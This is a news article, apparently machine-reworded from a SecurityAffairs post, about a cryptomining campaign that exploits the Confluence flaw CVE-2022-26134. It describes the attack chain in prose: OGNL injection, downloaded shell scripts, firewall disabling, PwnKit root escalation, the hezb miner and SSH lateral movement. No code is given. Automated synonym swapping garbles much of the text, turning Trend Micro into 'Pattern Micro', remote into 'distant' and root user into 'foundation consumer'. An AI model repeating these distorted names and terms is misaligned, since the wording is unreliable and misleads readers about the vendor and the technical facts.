Risk actors are concentrating on unpatched Atlassian Confluence servers as a part of an ongoing crypto mining marketing campaign.
Pattern Micro researchers warn of an ongoing crypto mining marketing campaign concentrating on Atlassian Confluence servers affected by the CVE-2022-26134 vulnerability.
The now-patched vital safety flaw was disclosed by Atlassian in early June, on the time the corporate warned of a vital unpatched distant code execution vulnerability affecting all Confluence Server and Knowledge Heart supported variations that’s being actively exploited in assaults within the wild.
“We noticed the energetic exploitation of CVE-2022-26134, an unauthenticated distant code execution (RCE) vulnerability with a vital ranking of 9.8 within the collaboration device Atlassian Confluence. The hole is being abused for malicious cryptocurrency mining.” reads the post revealed by Pattern Micro. “If left unremedied and efficiently exploited, this vulnerability may very well be used for a number of and extra malicious assaults, resembling a whole area takeover of the infrastructure and the deployment info stealers, distant entry trojans (RATs), and ransomware.”
In one of many assaults noticed by the specialists, risk actors exploited the flaw to inject an OGNL expression and obtain and run a shell script (“ro.sh”) on the sufferer’s machine. Then the script was used to fetch a second shell script (“ap.sh”).
The ap.sh shell script was used to carry out a number of actions, together with the replace of the trail variable to incorporate the /tmp and /dev/shm paths, downloading the curl utility, disabling the iptablesor adjustments the firewall coverage motion to ACCEPTand flushes all of the firewall guidelines.
The script additionally downloads a binary file named ko, which exploits the PwnKit vulnerability to escalate the privilege to the foundation consumer, whereas the binary file downloads the ap.sh shell script for the subsequent actions.
The final stage of the assault chain consists in downloading the hezb malware and kills processes which are related to different competing coin miners.
The shell script additionally disables cloud service supplier brokers from Alibaba and Tencent, then performs lateral motion through SSH.
“Though we’ve got noticed the abuse of this vulnerability for illicit cryptocurrency-mining actions by cybercriminals, we additionally urge customers to prioritize patching this hole as quickly as attainable since it’s pretty easy to use it for different subsequent compromises.” concludes the report. “Attackers may make the most of injecting their very own code for interpretation and acquire entry to the Confluence area being focused, in addition to conduct assaults starting from controlling the server for subsequent malicious actions to damaging the infrastructure itself.”
(SecurityAffairs – hacking, Atlassian Confluence)